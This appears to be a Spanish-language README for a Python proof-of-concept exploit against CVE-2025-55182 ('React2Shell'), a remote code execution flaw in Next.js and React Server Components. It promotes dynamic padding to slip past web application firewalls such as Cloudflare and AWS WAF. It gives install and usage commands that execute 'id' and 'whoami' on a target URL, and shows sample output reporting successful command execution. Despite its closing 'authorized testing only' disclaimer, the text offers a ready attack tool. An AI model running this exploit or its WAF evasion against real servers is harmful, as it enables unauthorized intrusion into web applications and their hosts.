
PoC en Python para CVE-2025-55182 (React2Shell) RCE en Next.js/React Server Components con relleno dinámico de evasión de WAF para pruebas de seguridad autorizadas.
Un exploit de prueba de concepto limpio y confiable en Python para CVE-2025-55182 (también conocido como React2Shell), una vulnerabilidad crítica de ejecución remota de código en los Componentes de Servidor React utilizados por Next.js (App Router) y frameworks similares.
Este PoC incluye relleno dinámico de bypass de WAF para evadir cortafuegos de aplicaciones web comunes (Cloudflare, AWS WAF, etc.) que limitan la inspección profunda de cuerpos multipart grandes.
requestspip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
Esta herramienta es solo para pruebas de seguridad autorizadas e investigación.